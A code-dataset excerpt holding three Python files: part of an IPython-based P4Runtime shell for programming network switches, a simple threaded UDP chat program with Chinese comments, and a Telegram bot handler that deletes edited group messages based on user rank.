entry.action.action.CopyFrom(self._action_spec.msg())
elif self._action_spec_type == self._ActionSpecType.MEMBER_ID:
entry.action.action_profile_member_id = self._action_spec
elif self._action_spec_type == self._ActionSpecType.GROUP_ID:
entry.action.action_profile_group_id = self._action_spec
elif self._action_spec_type == self._ActionSpecType.ONESHOT:
entry.action.action_profile_action_set.CopyFrom(self._action_spec.msg())
if self._counter_data is None:
entry.ClearField('counter_data')
else:
entry.counter_data.CopyFrom(self._counter_data.msg())
if self._meter_config is None:
entry.ClearField('meter_config')
else:
entry.meter_config.CopyFrom(self._meter_config.msg())
self._entry = entry
def _validate_msg(self):
if self.is_default and self.match._count() > 0:
raise UserError(
"Match key must be empty for default entry, use <self>.is_default = False "
"or <self>.match.clear (whichever one is appropriate)")
def clear_action(self):
"""Clears the action spec for the TableEntry."""
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
def clear_match(self):
"""Clears the match spec for the TableEntry."""
self.match.clear()
def clear_counter_data(self):
"""Clear all counter data, same as <self>.counter_data = None"""
self._counter_data = None
def clear_meter_config(self):
"""Clear the meter config, same as <self>.meter_config = None"""
self._meter_config = None
class _CounterEntryBase(_P4EntityBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._counter_type = self._info.spec.unit
self._data = None
def __dir__(self):
return super().__dir__() + _CounterData.attrs_for_counter_type(self._counter_type) + [
"clear_data"]
def __call__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change counter name")
if name == "byte_count" or name == "packet_count":
self._data = _CounterData.set_count(
self._data, self.name, self._counter_type, name, value)
return
if name == "data":
if value is None:
self._data = None
return
raise UserError("Cannot set 'data' directly")
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "byte_count" or name == "packet_count":
self._data, r = _CounterData.get_count(
self._data, self.name, self._counter_type, name)
return r
if name == "data":
if self._data is None:
self._data = _CounterData(self.name, self._counter_type)
return self._data
return super().__getattr__(name)
def _from_msg(self, msg):
self._entry.CopyFrom(msg)
if msg.HasField('data'):
self._data = _CounterData(self.name, self._counter_type)
self._data._from_msg(msg.data)
else:
self._data = None
def _update_msg(self):
if self._data is None:
self._entry.ClearField('data')
else:
self._entry.data.CopyFrom(self._data.msg())
def clear_data(self):
"""Clear all counter data, same as <self>.data = None"""
self._data = None
class CounterEntry(_CounterEntryBase):
def __init__(self, counter_name=None):
super().__init__(
P4Type.counter, P4RuntimeEntity.counter_entry,
p4runtime_pb2.CounterEntry, counter_name,
modify_only=True)
self._entry.counter_id = self.id
self.__doc__ = """
An entry for counter '{}'
Use <self>.info to display the P4Info entry for this counter.
Set the index with <self>.index = <expr>.
To reset it (e.g. for wildcard read), set it to None.
Access byte count and packet count with <self>.byte_count / <self>.packet_count.
To read from the counter, use <self>.read
To write to the counter, use <self>.modify
""".format(counter_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["index", "data"]
def __setattr__(self, name, value):
if name == "index":
if value is None:
self._entry.ClearField('index')
return
if type(value) is not int:
raise UserError("index must be an integer")
self._entry.index.index = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
return self._entry.index.index
return super().__getattr__(name)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
counter entries (CounterEntry instances) returned by the
server. Otherwise, function is applied to all the counter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
class DirectCounterEntry(_CounterEntryBase):
def __init__(self, direct_counter_name=None):
super().__init__(
P4Type.direct_counter, P4RuntimeEntity.direct_counter_entry,
p4runtime_pb2.DirectCounterEntry, direct_counter_name,
modify_only=True)
self._direct_table_id = self._info.direct_table_id
try:
self._direct_table_name = context.get_name_from_id(self._direct_table_id)
except KeyError:
raise InvalidP4InfoError("direct_table_id {} is not a valid table id".format(
self._direct_table_id))
self._table_entry = TableEntry(self._direct_table_name)
self.__doc__ = """
An entry for direct counter '{}'
Use <self>.info to display the P4Info entry for this direct counter.
Set the table_entry with <self>.table_entry = <TableEntry instance>.
The TableEntry instance must be for the table to which the direct counter is attached.
To reset it (e.g. for wildcard read), set it to None. It is the same as:
<self>.table_entry = TableEntry({})
Access byte count and packet count with <self>.byte_count / <self>.packet_count.
To read from the counter, use <self>.read
To write to the counter, use <self>.modify
""".format(direct_counter_name, self._direct_table_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["table_entry"]
def __setattr__(self, name, value):
if name == "index":
raise UserError("Direct counters are not index-based")
if name == "table_entry":
if value is None:
self._table_entry = TableEntry(self._direct_table_name)
return
if not isinstance(value, TableEntry):
raise UserError("table_entry must be an instance of TableEntry")
if value.name != self._direct_table_name:
raise UserError("This DirectCounterEntry is for table '{}'".format(
self._direct_table_name))
self._table_entry = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
raise UserError("Direct counters are not index-based")
if name == "table_entry":
return self._table_entry
return super().__getattr__(name)
def _update_msg(self):
super()._update_msg()
if self._table_entry is None:
self._entry.ClearField('table_entry')
else:
self._entry.table_entry.CopyFrom(self._table_entry.msg())
def _from_msg(self, msg):
super()._from_msg(msg)
if msg.HasField('table_entry'):
self._table_entry._from_msg(msg.table_entry)
else:
self._table_entry = None
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
direct counter entries (DirectCounterEntry instances) returned by the
server. Otherwise, function is applied to all the direct counter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
class _MeterEntryBase(_P4EntityBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._meter_type = self._info.spec.unit
self._config = None
def __dir__(self):
return super().__dir__() + _MeterConfig.attrs() + ["clear_config"]
def __call__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change meter name")
if name in _MeterConfig.attrs():
self._config = _MeterConfig.set_param(
self._config, self.name, self._meter_type, name, value)
return
if name == "config":
if value is None:
self._config = None
return
raise UserError("Cannot set 'config' directly")
super().__setattr__(name, value)
def __getattr__(self, name):
if name in _MeterConfig.attrs():
self._config, r = _MeterConfig.get_param(
self._config, self.name, self._meter_type, name)
return r
if name == "config":
if self._config is None:
self._config = _MeterConfig(self.name, self._meter_type)
return self._config
return super().__getattr__(name)
def _from_msg(self, msg):
self._entry.CopyFrom(msg)
if msg.HasField('config'):
self._config = _MeterConfig(self.name, self._meter_type)
self._config._from_msg(msg.config)
else:
self._config = None
def _update_msg(self):
if self._config is None:
self._entry.ClearField('config')
else:
self._entry.config.CopyFrom(self._config.msg())
def clear_config(self):
"""Clear the meter config, same as <self>.config = None"""
self._config = None
class MeterEntry(_MeterEntryBase):
def __init__(self, meter_name=None):
super().__init__(
P4Type.meter, P4RuntimeEntity.meter_entry,
p4runtime_pb2.MeterEntry, meter_name,
modify_only=True)
self._entry.meter_id = self.id
self.__doc__ = """
An entry for meter '{}'
Use <self>.info to display the P4Info entry for this meter.
Set the index with <self>.index = <expr>.
To reset it (e.g. for wildcard read), set it to None.
Access meter rates and burst sizes with:
<self>.cir
<self>.cburst
<self>.pir
<self>.pburst
To read from the meter, use <self>.read
To write to the meter, use <self>.modify
""".format(meter_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["index", "config"]
def __setattr__(self, name, value):
if name == "index":
if value is None:
self._entry.ClearField('index')
return
if type(value) is not int:
raise UserError("index must be an integer")
self._entry.index.index = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
return self._entry.index.index
return super().__getattr__(name)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
meter entries (MeterEntry instances) returned by the
server. Otherwise, function is applied to all the meter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
class DirectMeterEntry(_MeterEntryBase):
def __init__(self, direct_meter_name=None):
super().__init__(
P4Type.direct_meter, P4RuntimeEntity.direct_meter_entry,
p4runtime_pb2.DirectMeterEntry, direct_meter_name,
modify_only=True)
self._direct_table_id = self._info.direct_table_id
try:
self._direct_table_name = context.get_name_from_id(self._direct_table_id)
except KeyError:
raise InvalidP4InfoError("direct_table_id {} is not a valid table id".format(
self._direct_table_id))
self._table_entry = TableEntry(self._direct_table_name)
self.__doc__ = """
An entry for direct meter '{}'
Use <self>.info to display the P4Info entry for this direct meter.
Set the table_entry with <self>.table_entry = <TableEntry instance>.
The TableEntry instance must be for the table to which the direct meter is attached.
To reset it (e.g. for wildcard read), set it to None. It is the same as:
<self>.table_entry = TableEntry({})
Access meter rates and burst sizes with:
<self>.cir
<self>.cburst
<self>.pir
<self>.pburst
To read from the meter, use <self>.read
To write to the meter, use <self>.modify
""".format(direct_meter_name, self._direct_table_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["table_entry"]
def __setattr__(self, name, value):
if name == "index":
raise UserError("Direct meters are not index-based")
if name == "table_entry":
if value is None:
self._table_entry = TableEntry(self._direct_table_name)
return
if not isinstance(value, TableEntry):
raise UserError("table_entry must be an instance of TableEntry")
if value.name != self._direct_table_name:
raise UserError("This DirectMeterEntry is for table '{}'".format(
self._direct_table_name))
self._table_entry = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
raise UserError("Direct meters are not index-based")
if name == "table_entry":
return self._table_entry
return super().__getattr__(name)
def _update_msg(self):
super()._update_msg()
if self._table_entry is None:
self._entry.ClearField('table_entry')
else:
self._entry.table_entry.CopyFrom(self._table_entry.msg())
def _from_msg(self, msg):
super()._from_msg(msg)
if msg.HasField('table_entry'):
self._table_entry._from_msg(msg.table_entry)
else:
self._table_entry = None
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
direct meter entries (DirectMeterEntry instances) returned by the
server. Otherwise, function is applied to all the direct meter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
class P4RuntimeEntityBuilder:
def __init__(self, obj_type, entity_type, entity_cls):
self._obj_type = obj_type
self._names = sorted([name for name, _ in context.get_objs(obj_type)])
self._entity_type = entity_type
self._entity_cls = entity_cls
self.__doc__ = """Construct a {} entity
Usage: <var> = {}["<{} name>"]
This is equivalent to <var> = {}(<{} name>)
Use command '{}' to see list of {}
""".format(entity_cls.__name__, entity_type.name, obj_type.pretty_name,
entity_cls.__name__, obj_type.pretty_name,
obj_type.p4info_name, obj_type.pretty_names)
def _ipython_key_completions_(self):
return self._names
def __getitem__(self, name):
obj = context.get_obj(self._obj_type, name)
if obj is None:
raise UserError("{} '{}' does not exist".format(
self._obj_type.pretty_name, name))
return self._entity_cls(name)
def __setitem__(self, name, value):
raise UserError("Operation not allowed")
def _repr_pretty_(self, p, cycle):
p.text(self.__doc__)
def __str__(self):
return "Construct a {} entity".format(self.entity_cls.__name__)
class Replica:
"""
A port "replica" (port number + instance id) used for multicast and clone session programming.
Construct with Replica(egress_port, instance=<instance>).
You can set / get attributes egress_port (required), instance (default 0).
"""
def __init__(self, egress_port=None, instance=0):
if egress_port is None:
raise UserError("egress_port is required")
self._msg = p4runtime_pb2.Replica()
self._msg.egress_port = egress_port
self._msg.instance = instance
def __dir__(self):
return ["port", "egress_port", "instance"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name == "egress_port" or name == "port":
if type(value) is not int:
raise UserError("egress_port must be an integer")
self._msg.egress_port = value
return
if name == "instance":
if type(value) is not int:
raise UserError("instance must be an integer")
self._msg.instance = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "egress_port" or name == "port":
return self._msg.egress_port
if name == "instance":
return self._msg.instance
return super().__getattr__(name)
def __str__(self):
return str(self._msg)
def _repr_pretty_(self, p, cycle):
p.text(str(p))
class MulticastGroupEntry(_EntityBase):
def __init__(self, group_id=0):
super().__init__(
P4RuntimeEntity.packet_replication_engine_entry,
p4runtime_pb2.PacketReplicationEngineEntry)
self.group_id = group_id
self.replicas = []
self.__doc__ = """
Multicast group entry.
Create an instance with multicast_group_entry(<group_id>).
Add replicas with <self>.add(<eg_port_1>, <instance_1>).add(<eg_port_2>, <instance_2>)...
"""
self._init = True
def __dir__(self):
return ["group_id", "replicas"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
elif name == "group_id":
if type(value) is not int:
raise UserError("group_id must be an integer")
elif name == "replicas":
if type(value) is not list:
raise UserError("replicas must be a list of Replica objects")
for r in value:
if type(r) is not Replica:
raise UserError("replicas must be a list of Replica objects")
super().__setattr__(name, value)
def _from_msg(self, msg):
self.group_id = msg.multicast_group_entry.multicast_group_id
for r in msg.multicast_group_entry.replicas:
self.add(r.egress_port, r.instance)
def read(self, function=None):
"""Generate a P4Runtime Read RPC to read a single MulticastGroupEntry
(wildcard reads not supported).
If function is None, return a MulticastGroupEntry instance (or None if
the provided group id does not exist). If function is not None, function
is applied to the MulticastGroupEntry instance (if any).
"""
if function is None:
return next(super().read())
else:
super().read(function)
def _update_msg(self):
entry = p4runtime_pb2.PacketReplicationEngineEntry()
mcg_entry = entry.multicast_group_entry
mcg_entry.multicast_group_id = self.group_id
for replica in self.replicas:
r = mcg_entry.replicas.add()
r.CopyFrom(replica._msg)
self._entry = entry
def _validate_msg(self):
if self.group_id == 0:
raise UserError("0 is not a valid group_id for MulticastGroupEntry")
def add(self, egress_port=None, instance=0):
"""Add a replica to the multicast group."""
self.replicas.append(Replica(egress_port, instance))
return self
class CloneSessionEntry(_EntityBase):
def __init__(self, session_id=0):
super().__init__(
P4RuntimeEntity.packet_replication_engine_entry,
p4runtime_pb2.PacketReplicationEngineEntry)
self.session_id = session_id
self.replicas = []
self.cos = 0
self.packet_length_bytes = 0
self.__doc__ = """
Clone session entry.
Create an instance with clone_session_entry(<session_id>).
Add replicas with <self>.add(<eg_port_1>, <instance_1>).add(<eg_port_2>, <instance_2>)...
Access class of service with <self>.cos.
Access truncation length with <self>.packet_length_bytes.
"""
self._init = True
def __dir__(self):
return ["session_id", "replicas", "cos", "packet_length_bytes"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
elif name == "session_id":
if type(value) is not int:
raise UserError("session_id must be an integer")
elif name == "replicas":
if type(value) is not list:
raise UserError("replicas must be a list of Replica objects")
for r in value:
if type(r) is not Replica:
raise UserError("replicas must be a list of Replica objects")
elif name == "cos":
if type(value) is not int:
raise UserError("cos must be an integer")
elif name == "packet_length_bytes":
if type(value) is not int:
raise UserError("packet_length_bytes must be an integer")
super().__setattr__(name, value)
def _from_msg(self, msg):
self.session_id = msg.clone_session_entry.session_id
for r in msg.clone_session_entry.replicas:
self.add(r.egress_port, r.instance)
self.cos = msg.clone_session_entry.class_of_service
self.packet_length_bytes = msg.clone_session_entry.packet_length_bytes
def read(self, function=None):
"""Generate a P4Runtime Read RPC to read a single CloneSessionEntry
(wildcard reads not supported).
If function is None, return a CloneSessionEntry instance (or None if
the provided group id does not exist). If function is not None, function
is applied to the CloneSessionEntry instance (if any).
"""
if function is None:
return next(super().read())
else:
super().read(function)
def _update_msg(self):
entry = p4runtime_pb2.PacketReplicationEngineEntry()
cs_entry = entry.clone_session_entry
cs_entry.session_id = self.session_id
for replica in self.replicas:
r = cs_entry.replicas.add()
r.CopyFrom(replica._msg)
cs_entry.class_of_service = self.cos
cs_entry.packet_length_bytes = self.packet_length_bytes
self._entry = entry
def add(self, egress_port=None, instance=0):
"""Add a replica to the clone session."""
self.replicas.append(Replica(egress_port, instance))
return self
class PacketMetadata:
def __init__(self, metadata_info_list):
self._md_info = OrderedDict()
self._md = OrderedDict()
# Initialize every metadata to zero value
for md in metadata_info_list:
self._md_info[md.name] = md
self._md[md.name] = self._parse_md('0', md)
self._set_docstring()
def _set_docstring(self):
self.__doc__ = "Available metadata:\n\n"
for name, info in self._md_info.items():
self.__doc__ += str(info)
self.__doc__ += """
Set a metadata value with <self>.['<metadata_name>'] = '...'
You may also use <self>.set(<md_name>='<value>')
"""
def __dir__(self):
return ["clear"]
def _get_md_info(self, name):
if name in self._md_info:
return self._md_info[name]
raise UserError("'{}' is not a valid metadata name".format(name))
def __getitem__(self, name):
_ = self._get_md_info(name)
print(self._md.get(name, "Unset"))
def _parse_md(self, value, md_info):
if type(value) is not str:
raise UserError("Metadata value must be a string")
md = p4runtime_pb2.PacketMetadata()
md.metadata_id = md_info.id
md.value = bytes_utils.parse_value(value.strip(), md_info.bitwidth)
return md
def __setitem__(self, name, value):
md_info = self._get_md_info(name)
self._md[name] = self._parse_md(value, md_info)
def _ipython_key_completions_(self):
return self._md_info.keys()
def set(self, **kwargs):
for name, value in kwargs.items():
self[name] = value
def clear(self):
self._md.clear()
def values(self):
return self._md.values()
class PacketIn():
def __init__(self):
ctrl_pkt_md = P4Objects(P4Type.controller_packet_metadata)
self.md_info_list = {}
if "packet_in" in ctrl_pkt_md:
self.p4_info = ctrl_pkt_md["packet_in"]
for md_info in self.p4_info.metadata:
self.md_info_list[md_info.name] = md_info
self.packet_in_queue = queue.Queue()
def _packet_in_recv_func(packet_in_queue):
while True:
msg = client.get_stream_packet("packet", timeout=None)
if not msg:
break
packet_in_queue.put(msg)
self.recv_t = Thread(target=_packet_in_recv_func, args=(self.packet_in_queue, ))
self.recv_t.start()
def sniff(self, function=None, timeout=None):
"""
Return an iterator of packet-in messages.
If the function is provided, we do not return an iterator and instead we apply
the function to every packet-in message.
"""
msgs = []
while True:
try:
msgs.append(self.packet_in_queue.get(block=True, timeout=timeout))
except queue.Empty:
# No item available when timeout.
break
except KeyboardInterrupt:
# User sends an interrupt(e.g., Ctrl+C).
break
if function is None:
return iter(msgs)
else:
for msg in msgs:
function(msg)
class PacketOut:
def __init__(self, payload=b'', **kwargs):
self.p4_info = P4Objects(P4Type.controller_packet_metadata)["packet_out"]
self.payload = payload
self.metadata = PacketMetadata(self.p4_info.metadata)
if kwargs:
for key, value in kwargs.items():
self.metadata[key] = value
def _update_msg(self):
self._entry = p4runtime_pb2.PacketOut()
self._entry.payload = self.payload
self._entry.metadata.extend(self.metadata.values())
def __setattr__(self, name, value):
if name == "payload" and type(value) is not bytes:
raise UserError("payload must be a bytes type")
if name == "metadata" and type(value) is not PacketMetadata:
raise UserError("metadata must be a PacketMetadata type")
return super().__setattr__(name, value)
def __dir__(self):
return ["metadata", "send", "payload"]
def __str__(self):
self._update_msg()
return str(_repr_pretty_p4runtime(self._entry))
def _repr_pretty_(self, p, cycle):
self._update_msg()
p.text(_repr_pretty_p4runtime(self._entry))
def send(self):
self._update_msg()
msg = p4runtime_pb2.StreamMessageRequest()
msg.packet.CopyFrom(self._entry)
client.stream_out_q.put(msg)
def Write(input_):
"""
Reads a WriteRequest from a file (text format) and sends it to the server.
It rewrites the device id and election id appropriately.
"""
req = p4runtime_pb2.WriteRequest()
if os.path.isfile(input_):
with open(input_, 'r') as f:
google.protobuf.text_format.Merge(f.read(), req)
client.write(req)
else:
raise UserError(
"Write only works with files at the moment and '{}' is not a file".format(
input_))
def APIVersion():
"""
Returns the version of the P4Runtime API implemented by the server, using
the Capabilities RPC.
"""
return client.api_version()
# see https://ipython.readthedocs.io/en/stable/config/details.html
class MyPrompt(Prompts):
def in_prompt_tokens(self, cli=None):
return [(Token.Prompt, 'P4Runtime sh'),
(Token.PrompSeparator, ' >>> ')]
FwdPipeConfig = namedtuple('FwdPipeConfig', ['p4info', 'bin'])
def get_arg_parser():
def election_id(arg):
try:
nums = tuple(int(x) for x in arg.split(','))
if len(nums) != 2:
raise argparse.ArgumentError
return nums
except Exception:
raise argparse.ArgumentError(
"Invalid election id, expected <Hi>,<Lo>")
def pipe_config(arg):
try:
paths = FwdPipeConfig(*[x for x in arg.split(',')])
if len(paths) != 2:
raise argparse.ArgumentError
return paths
except Exception:
raise argparse.ArgumentError(
"Invalid pipeline config, expected <p4info path>,<binary config path>")
parser = argparse.ArgumentParser(description='P4Runtime shell')
parser.add_argument('--device-id',
help='Device id',
type=int, action='store', default=1)
parser.add_argument('--grpc-addr',
help='P4Runtime gRPC server address',
metavar='<IP>:<port>',
type=str, action='store', default='localhost:9559')
parser.add_argument('-v', '--verbose', help='Increase output verbosity',
action='store_true')
parser.add_argument('--election-id',
help='Election id to use',
metavar='<Hi>,<Lo>',
type=election_id, action='store', default=(1, 0))
parser.add_argument('--config',
help='If you want the shell to push a pipeline config to the server first',
metavar='<p4info path (text)>,<binary config path>',
type=pipe_config, action='store', default=None)
return parser
def setup(device_id=1, grpc_addr='localhost:9559', election_id=(1, 0), config=None):
global client
logging.debug("Creating P4Runtime client")
client = P4RuntimeClient(device_id, grpc_addr, election_id)
if config is not None:
try:
p4info_path = config.p4info
bin_path = config.bin
except Exception:
raise ValueError("Argument 'config' must be a FwdPipeConfig namedtuple")
try:
client.set_fwd_pipe_config(p4info_path, bin_path)
except FileNotFoundError as e:
logging.critical(e)
client.tear_down()
sys.exit(1)
except P4RuntimeException as e:
logging.critical("Error when setting config")
logging.critical(e)
client.tear_down()
sys.exit(1)
except Exception:
logging.critical("Error when setting config")
client.tear_down()
sys.exit(1)
try:
p4info = client.get_p4info()
except P4RuntimeException as e:
logging.critical("Error when retrieving P4Info")
logging.critical(e)
client.tear_down()
sys.exit(1)
logging.debug("Parsing P4Info message")
context.set_p4info(p4info)
def teardown():
global client
logging.debug("Tearing down P4Runtime client")
client.tear_down()
client = None
def main():
parser = get_arg_parser()
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
setup(args.device_id, args.grpc_addr, args.election_id, args.config)
c = Config()
c.TerminalInteractiveShell.banner1 = '*** Welcome to the IPython shell for P4Runtime ***'
c.TerminalInteractiveShell.prompts_class = MyPrompt
c.TerminalInteractiveShell.autocall = 2
c.TerminalInteractiveShell.show_rewritten_input = False
user_ns = {
"TableEntry": TableEntry,
"MatchKey": MatchKey,
"Action": Action,
"CounterEntry": CounterEntry,
"DirectCounterEntry": DirectCounterEntry,
"MeterEntry": MeterEntry,
"DirectMeterEntry": DirectMeterEntry,
"ActionProfileMember": ActionProfileMember,
"GroupMember": GroupMember,
"ActionProfileGroup": ActionProfileGroup,
"OneshotAction": OneshotAction,
"Oneshot": Oneshot,
"p4info": context.p4info,
"Write": Write,
"Replica": Replica,
"MulticastGroupEntry": MulticastGroupEntry,
"CloneSessionEntry": CloneSessionEntry,
"APIVersion": APIVersion,
"global_options": global_options,
}
for obj_type in P4Type:
user_ns[obj_type.p4info_name] = P4Objects(obj_type)
supported_entities = [
(P4RuntimeEntity.table_entry, P4Type.table, TableEntry),
(P4RuntimeEntity.counter_entry, P4Type.counter, CounterEntry),
(P4RuntimeEntity.direct_counter_entry, P4Type.direct_counter, DirectCounterEntry),
(P4RuntimeEntity.meter_entry, P4Type.meter, MeterEntry),
(P4RuntimeEntity.direct_meter_entry, P4Type.direct_meter, DirectMeterEntry),
(P4RuntimeEntity.action_profile_member, P4Type.action_profile, ActionProfileMember),
(P4RuntimeEntity.action_profile_group, P4Type.action_profile, ActionProfileGroup),
]
for entity, p4type, cls in supported_entities:
user_ns[entity.name] = P4RuntimeEntityBuilder(p4type, entity, cls)
user_ns["multicast_group_entry"] = MulticastGroupEntry
user_ns["clone_session_entry"] = CloneSessionEntry
user_ns["packet_in"] = PacketIn() # Singleton packet_in object to handle all packet-in cases
user_ns["packet_out"] = PacketOut
start_ipython(user_ns=user_ns, config=c, argv=[])
client.tear_down()
if __name__ == '__main__': # pragma: no cover
main()
|
MultiTaskchat.py
|
# -*- coding:utf-8 -*-
# 多任务版udp聊天器(一)
"""
说明:
1. 编写一个有2个线程的程序
2. 线程1用来接收数据然后显示.
3. 线程2用来检测键盘数据然后通过udp发送数据.
要求:
- 总结多任务程序的特点.
改进思路:
1. 单独开子线程用于接收消息,以达到收发消息可以同时进行.
2. 接收消息要能够连续接收多次,而不是一次.
3. 设置子线程守护主线程(解决无法正常退出问题)
"""
# 开辟子线程,实现发送消息的同时接收消息.
import socket
import time
import threading
def send_msg(udpsocket):
"""发送信息的函数"""
ipaddr = input("请输入接收方的IP地址:")
portnum = input("请输入接收方的端口号:")
content = input("请输入要发送的内容:")
udpsocket.sendto(content.encode(),(ipaddr,int(portnum)))
def recv_msg(udpsocket):
"""接收信息的函数"""
# while True:
recvdata,ip_port = udpsocket.recvfrom(1024)
recvtxt = recvdata.decode()
print("接收到{m}的消息:{s}".format(m=str(ip_port),s=recvtxt))
"""
recvdata = udpsocket.recvfrom(1024)
recvda = recvdata[0].decode("utf-8")
print(recvda)
"""
# print("接收到{m}的消息:{s}".format(m=str(ip_port),s=recvtxt))
def main():
"""程序主入口"""
udpsocket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
udpsocket.bind(("18.18.23.254",2500))
# 创建子线程,单独接收用户发送的消息
thread_recvmsg = threading.Thread(target=recv_msg,args=(udpsocket,))
# 设置子线程守护主线程
thread_recvmsg.setDaemon(True)
# 启动子线程.
thread_recvmsg.start()
while True:
print("\n" + "*"*20)
print("*"*10 + "1.发送信息" + "*"*10)
print("*"*10 + "2.退出系统" + "*"*10)
print("*"*20)
# 接收用户输入的选项:
sel_num = int(input("请输入选项:"))
# 判断用户选择,并且调用对应的函数.
if sel_num == 1:
print("您选择的是发送信息")
send_msg(udpsocket)
elif sel_num == 2:
print("系统正在退出中...")
print("系统退出完成.")
break
# 关闭套接字
udpsocket.close()
if __name__=="__main__":
# 程序独立运行时,才去启动聊天器.
main()
|
edit.py
|
from utlis.rank import setrank ,isrank ,remrank ,setsudos ,remsudos ,setsudo
from handlers.delete import delete
from utlis.tg import Bot
from config import *
import threading, requests, time, random
def edit(client, message,redis):
userID = message.from_user.id
chatID = message.chat.id
rank = isrank(redis,userID,chatID)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
redis.hincrby("{}Nbot:{}:edits".format(BOT_ID,chatID),userID)
if not message.outgoing:
if (rank is False or rank is 0) and group is True and redis.sismember("{}Nbot:Ledits".format(BOT_ID),chatID):
Bot("deleteMessage",{"chat_id":chatID,"message_id":message.message_id})
if not (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk") and group is True and redis.sismember("{}Nbot:Ledits".format(BOT_ID),chatID) and not message.text:
Bot("deleteMessage",{"chat_id":chatID,"message_id":message.message_id})
if not (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk") and group is True and not redis.sismember("{}Nbot:Ledits".format(BOT_ID),chatID):
t = threading.Thread(target=delete,args=(client, message,redis))
t.daemon = True
t.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.